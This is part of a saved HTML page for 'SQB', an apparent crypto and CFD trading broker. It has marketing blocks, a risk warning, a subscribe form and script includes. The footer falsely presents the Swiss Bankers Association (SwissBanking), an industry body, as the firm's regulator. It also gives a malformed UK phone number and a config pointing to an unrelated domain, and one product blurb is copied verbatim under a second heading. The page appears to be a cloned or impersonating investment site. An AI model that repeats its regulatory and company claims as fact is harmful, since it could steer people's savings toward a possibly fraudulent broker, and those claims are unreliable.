                    <li>24/7 trading on cryptocurrencies</li>
                    <li>Competitive leverage</li>
                    <li>Profit on both bull and bear markets</li>
                    <li>Dedicated support team</li>
                  </ul>
                </div>
              </div>

              <div class="acfm-row__col acfm-col-md-12 acfm-col-lg-12">
                <div class="acfm-image">


                  <img src="../wp-content/uploads/2023/01/image-1.png" alt="" width="" height="auto">

                </div>
              </div>
            </div>
            <div class="acfm-spacer acfm-normal-padding hide-mobile"></div>
          </div>
        </section>
        <section
          class="acfm-section acfm-normal-padding acfm-bg-image--align-center-center acfm-bg-image--size-cover acfm-text-align-center acfm-text-color-white">
          <div class="acfm-bg-image" style="background-image:url(../wp-content/uploads/2023/01/pic-4.png)"></div>

          <div class="acfm-section__container container">
            <div class="acfm-spacer acfm-normal-padding hide-mobile"></div>
            <h2 class="acfm-title acfm-text-lg acfm-text-semi-bold acfm-margin-bottom--small">
              <span>Pricing</span>
            </h2>
            <div class="acfm-text acfm-margin-bottom--normal acfm-text-contain">
              <p>At SQB, you get the opportunity to trade with transparent, real-time asset prices and tight spreads. We
                provide you with access to the necessary tools so you can extract the maximum value from every one of
                your trades.</p>
            </div>
            <div class="acfm-buttons">
              <a class="acfm-btn acfm-btn-primary acfm-ripple" href="../open-account/index.htm">
                <span class="acfm-btn__label">Open Account</span>
              </a>
            </div>


            <div class="acfm-spacer acfm-large-padding hide-mobile"></div>
          </div>
        </section>
        <section class="acfm-section acfm-normal-padding acfm-text-align-center">


          <div class="acfm-section__container container">
            <div class="acfm-spacer acfm-normal-padding hide-mobile"></div>
            <ul class="acfm-list-generator acfm-list-default">



              <li class=" acfm-list-default__item">



                <div class=" acfm-list-default__title">
                  Cryptocurrencies </div>

                <div class=" acfm-list-default__text">
                  Bitcoin and beyond: SQB currently offers 35 cryptocurrencies, providing you with all the advantages
                  digital currencies are able to offer. Enjoy the crypto-ride with the benefit of Swiss safety. </div>

              </li>





              <li class=" acfm-list-default__item">



                <div class=" acfm-list-default__title">
                  Crypto-asset products </div>

                <div class=" acfm-list-default__text">
                  Bitcoin and beyond: SQB currently offers 35 cryptocurrencies, providing you with all the advantages
                  digital currencies are able to offer. Enjoy the crypto-ride with the benefit of Swiss safety. </div>

              </li>





              <li class=" acfm-list-default__item">



                <div class=" acfm-list-default__title">
                  Education </div>

                <div class=" acfm-list-default__text">
                  Rule #1: Never invest in anything that you don’t understand! Our educational offer, including eBooks
                  and professional articles will provide you with solid basic knowledge and leaves no question
                  unanswered. </div>

              </li>





              <li class=" acfm-list-default__item">



                <div class=" acfm-list-default__title">
                  Institutional Services </div>

                <div class=" acfm-list-default__text">
                  Thanks to our strong regulatory framework, SQB is the ideal partner for institutional clients, so you
                  can provide your clients with the confidence and expertise they need when trading cryptocurrencies.
                </div>

              </li>


            </ul>
            <div class="acfm-spacer acfm-normal-padding hide-mobile"></div>
          </div>
        </section>
      </div>
    </main>


    <prf-tracker-widget cookiettl="43200"></prf-tracker-widget>

    <prf-site-location-tracking-widget page-name="'Crypto Assets'"></prf-site-location-tracking-widget>
  </prf-widget-manager>

  <footer class="acfm-footer-main acfm-normal-padding acfm-bg-dark acfm-text-color-white">

    <div class="acfm-footer-main__container container">
      <div class="acfm-footer-logo">
        <a class="acfm-footer-logo__link" href="index.htm" title="SQB">
          <svg class="svg-Logo">
            <use xlink:href="#Logo"></use>
          </svg>
        </a>
      </div>


      <div class="acfm-row acfm-row acfm-row--align-stretch acfm-row--justify-between acfm-colsCount-4">

        <div class="acfm-row__col acfm-col-md-6 acfm-col-lg-6">
          <div class="acfm-footer-title">
            Risk Warning:</div>
          <div class="acfm-footer-text">
            <p>Trading Foreign Exchange (Forex) and Contracts For Differences (CFD’s) is highly speculative, carries a
              high level of risk and may not be suitable for all investors. You may sustain a loss of some or all of
              your invested capital, therefore, you should not speculate with capital that you cannot afford to lose.
              You should be aware of all the risks associated with trading on margin.</p>
          </div>
        </div>

        <div class="acfm-row__col acfm-col-md-4 acfm-col-lg-4">
          <div class="acfm-footer-address">

            <h4 class="acfm-footer-main__title">Our Offices</h4>

            <div class="acfm-footer-address__address">

              <div class="acfm-footer-address__info">
                <h6 class="acfm-footer-address__title"></h6>
                <div class="acfm-footer-address__text">
                  <p>Authorised and Regulated: &nbsp; Schweizerische Bankiervereinigung (SwissBanking)</p>
                </div>
              </div>
            </div>

            <br>

            <div class="acfm-footer-address__address">

              <div class="acfm-footer-address__info">
                <h6 class="acfm-footer-address__title"></h6>
                <div class="acfm-footer-address__text">
                  <p>Company number: &nbsp; <a target="_blank"
                      href="https://www.uid.admin.ch/Detail.aspx?uid_id=CHE105814447">CHE-105.814.447</a></p>
                </div>
              </div>
            </div>

            <div class="acfm-footer-address__address">

              <div class="acfm-footer-address__info">
                <h6 class="acfm-footer-address__title"></h6>
                <div class="acfm-footer-address__text">
                  <p>Support email: &nbsp; support@sqb.ai</p>
                </div>
              </div>
            </div>

            <div class="acfm-footer-address__phone">

              <div class="acfm-footer-address__info">
                <h6 class="acfm-footer-address__title"></h6>
                <a class="acfm-footer-address__link" href="tel:+4489037465">+44 8903 7465</a>
              </div>
            </div>


            <div class="acfm-footer-address__address">

              <div class="acfm-footer-address__info">
                <h6 class="acfm-footer-address__title"></h6>
                <div class="acfm-footer-address__text">
                  <p>Our office address: &nbsp; Aeschenplatz 7, Basel, 4052 </p>
                </div>
              </div>
            </div>

            <div class="acfm-footer-address__address">

              <div class="acfm-footer-address__info">
                <h6 class="acfm-footer-address__title"></h6>
                <div class="acfm-footer-address__text">
                  <p>Incorporated on 01.01.1995</p>
                </div>
              </div>
            </div>

          </div>
        </div>

        <div class="acfm-row__col acfm-col-md-6 acfm-col-lg-4">
        </div>

        <div class="acfm-row__col acfm-col-md-6 acfm-col-lg-6">
          <div id='stay_in_touch' class="acfm-footer-subscribe">
            <div class="acfm-footer-subscribe__inner">
              <h4 class="acfm-footer-main__title">Stay in Touch</h4>

              <div class="acfm-footer-subscribe__form">
                <div class="wpcf7 no-js" id="wpcf7-f384-o1" lang="en-US" dir="ltr">
                  <div class="screen-reader-response">
                    <p role="status" aria-live="polite" aria-atomic="true"></p>
                    <ul></ul>
                  </div>
                  <form action="/#wpcf7-f384-o1" method="post" class="wpcf7-form init" aria-label="Contact form"
                    novalidate="novalidate" data-status="init">
                    <div class="cf7-subscribe-wrapper">
                      <label class="cf7-subscribe-control">
                        <span class="wpcf7-form-control-wrap customer-email">
                          <input required size="40"
                            class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email cf7-subscribe-input"
                            aria-required="true" aria-invalid="false" placeholder="Your Email" value="" type="email"
                            name="customer-email">
                          <span class="cf7-subscribe-placeholder">Email address</span>
                        </span>
                      </label>
                      <span class="submit-wrapper cf7-subscribe-submit">
                        <input required class="wpcf7-form-control has-spinner wpcf7-submit" type="submit"
                          value="Submit">
                        <button class="cf7-subscribe-submit">Submit</button>
                      </span>
                    </div>
                    <div class="wpcf7-response-output" aria-hidden="true"></div>
                  </form>
                </div>
              </div>

              <a href="./files_to_download/client-agreement.pdf" download style="width: 320px; margin: 30px 0;"
                class="acfm-btn acfm-btn-primary acfm-ripple acfm-margin-bottom--small" href="open-account/index.htm">
                <span>Client agreement</span>
              </a>
            </div>
          </div>
        </div>
      </div>

      <div class="acfm-footer-copyright">
        SQB - 2022 &copy; | All rights reserved.
      </div>
    </div>
  </footer>







  <script data-cfasync="false" src="../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
  <script src="../ajax/libs/jquery/3.3.1/jquery.min.js" id="jquery-js"></script>
  <script src="../ajax/libs/angular.js/1.8.2/angular.min.js" id="angular-js-js"></script>
  <script type='text/javascript' id='prf_widgets_config-js-extra'>
    /* <![CDATA[ */
    var domain = { "url": "tada.website" };
/* ]]> */
  </script>
  <script src="../wp-content/themes/prfwp/resources/assets/scripts/widget-config.js"
    id="prf_widgets_config-js"></script>
  <script src="../latest/prf.widgets.js" id="prf_widgets_script-js"></script>
  <script type='text/javascript' id='contact-form-7-js-extra'>
    /* <![CDATA[ */
    var wpcf7 = { "apiSettings": { "root": "https:\/\/sqb.ai\/wp-json\/contact-form-7\/v1", "namespace": "contact-form-7\/v1" } };
/* ]]> */
  </script>
  <script src="../wp-content/themes/prfwp/dist/scripts/contact-form-7_aef9cdc4.js" id="contact-form-7-js"></script>
  <script type='text/javascript' id='sage/main.js-js-extra'>
    /* <![CDATA[ */
    var main = { "home_url": "https:\/\/sqb.ai", "rtl": "", "PLATFORM_BRAND_GUST_TOKEN": "ad464355-4a4e-60bf-be64-d5b430c56775", "navSVGArrow": "<svg class=\"svg-arrow\"><use xlink:href=\"#arrow\"\/><\/svg>", "navScreenReaderText": { "expand": "Expand child menu", "collapse": "Collapse child menu" } };
/* ]]> */
  </script>
  <script src="../wp-content/themes/prfwp/dist/scripts/main_aef9cdc4.js" id="sage/main.js-js"></script>

</body>

</html>